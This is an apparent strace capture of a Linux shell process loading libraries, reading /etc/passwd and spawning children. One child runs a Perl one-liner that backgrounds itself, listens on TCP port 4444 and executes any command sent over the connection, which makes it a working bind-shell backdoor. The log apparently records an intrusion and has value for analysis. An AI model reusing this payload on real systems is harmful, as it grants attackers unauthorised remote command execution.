\0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

10404 07:32:51.869406 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

10404 07:32:51.869423 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d6e000

10404 07:32:51.869434 mmap2(0xb7d75000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7d75000

10404 07:32:51.869450 close(1)          = 0

10404 07:32:51.869461 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10404 07:32:51.869474 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

10404 07:32:51.869487 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

10404 07:32:51.869572 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

10404 07:32:51.869588 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d56000

10404 07:32:51.869599 mmap2(0xb7d6a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d6a000

10404 07:32:51.869613 mmap2(0xb7d6c000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d6c000

10404 07:32:51.869630 close(1)          = 0

10404 07:32:51.869655 munmap(0xb7efc000, 29913) = 0

10404 07:32:51.869699 open("/etc/ld.so.cache", O_RDONLY) = 1

10404 07:32:51.869713 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10404 07:32:51.869745 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7efc000

10404 07:32:51.869755 close(1)          = 0

10404 07:32:51.869765 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10404 07:32:51.869780 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

10404 07:32:51.869793 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10404 07:32:51.869880 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

10404 07:32:51.869897 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d4c000

10404 07:32:51.869908 mmap2(0xb7d54000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d54000

10404 07:32:51.869923 close(1)          = 0

10404 07:32:51.869935 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10404 07:32:51.869948 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

10404 07:32:51.869961 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10404 07:32:51.870048 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

10404 07:32:51.870064 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d41000

10404 07:32:51.870075 mmap2(0xb7d4a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d4a000

10404 07:32:51.870090 close(1)          = 0

10404 07:32:51.870111 munmap(0xb7efc000, 29913) = 0

10404 07:32:51.870126 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

10404 07:32:51.870140 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

10404 07:32:51.870151 _llseek(1, 0, [0], SEEK_CUR) = 0

10404 07:32:51.870193 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

10404 07:32:51.870211 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f03000

10404 07:32:51.870236 _llseek(1, 1624, [1624], SEEK_SET) = 0

10404 07:32:51.870251 munmap(0xb7f03000, 1624) = 0

10404 07:32:51.870260 close(1)          = 0

10404 07:32:51.870288 getpgrp()         = 3831

10404 07:32:51.870298 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

10404 07:32:51.870313 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

10404 07:32:51.870328 brk(0x8101000)    = 0x8101000

10404 07:32:51.870359 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10404 07:32:51.870373 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10404 07:32:51.870387 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10404 07:32:51.870423 brk(0x8102000)    = 0x8102000

10404 07:32:51.870448 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10404 07:32:51.870467 stat64("/sbin/AB", 0xbf9c4818) = -1 ENOENT (No such file or directory)

10404 07:32:51.870479 stat64("/bin/AB", 0xbf9c4818) = -1 ENOENT (No such file or directory)

10404 07:32:51.870489 stat64("/usr/sbin/AB", 0xbf9c4818) = -1 ENOENT (No such file or directory)

10404 07:32:51.870501 stat64("/usr/bin/AB", 0xbf9c4818) = -1 ENOENT (No such file or directory)

10404 07:32:51.870513 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10404 07:32:51.870527 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d776f8) = 10405

10405 07:32:51.870570 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10405 07:32:51.870586 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10405 07:32:51.870598 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10405 07:32:51.870610 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10405 07:32:51.870625 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10405 07:32:51.870640 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10405 07:32:51.870652 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10405 07:32:51.871032 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

10405 07:32:51.871112 --- SIGPIPE (Broken pipe) @ 0 (0) ---

10405 07:32:51.871199 exit_group(127)   = ?

10404 07:32:51.886269 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>

4519  07:32:51.886313 waitpid(10404,  <unfinished ...>

10404 07:32:51.886336 <... rt_sigprocmask resumed> NULL, 8) = 0

10404 07:32:51.886342 --- SIGCHLD (Child exited) @ 0 (0) ---

10404 07:32:51.886354 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 10405

10404 07:32:51.886368 waitpid(-1, 0xbf9c4498, WNOHANG) = -1 ECHILD (No child processes)

10404 07:32:51.886378 sigreturn()       = ? (mask now [])

10404 07:32:51.886400 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10404 07:32:51.886414 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10404 07:32:51.886424 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10404 07:32:51.886436 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

10404 07:32:51.886453 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10404 07:32:51.886464 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

10404 07:32:51.886496 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10404 07:32:51.886515 stat64("/sbin/perl", 0xbf9c4848) = -1 ENOENT (No such file or directory)

10404 07:32:51.886527 stat64("/bin/perl", 0xbf9c4848) = -1 ENOENT (No such file or directory)

10404 07:32:51.886538 stat64("/usr/sbin/perl", 0xbf9c4848) = -1 ENOENT (No such file or directory)

10404 07:32:51.886549 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10404 07:32:51.886566 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10404 07:32:51.886590 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10404 07:32:51.886603 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d776f8) = 10406

10406 07:32:51.886643 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10406 07:32:51.886659 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10406 07:32:51.886671 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10406 07:32:51.886687 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10406 07:32:51.886771 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10406 07:32:51.886802 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10406 07:32:51.886815 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10406 07:32:51.886846 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

10406 07:32:51.886926 brk(0)            = 0x8153000

10406 07:32:51.886945 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10406 07:32:51.886960 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f0b000

10406 07:32:51.886975 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10406 07:32:51.886991 open("/etc/ld.so.cache", O_RDONLY) = 1

10406 07:32:51.887002 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10406 07:32:51.887018 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f03000

10406 07:32:51.887028 close(1)          = 0

10406 07:32:51.887038 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10406 07:32:51.887053 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10406 07:32:51.887066 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10406 07:32:51.887155 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10406 07:32:51.887172 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7eff000

10406 07:32:51.887183 mmap2(0xb7f01000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f01000

10406 07:32:51.887228 close(1)          = 0

10406 07:32:51.887240 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

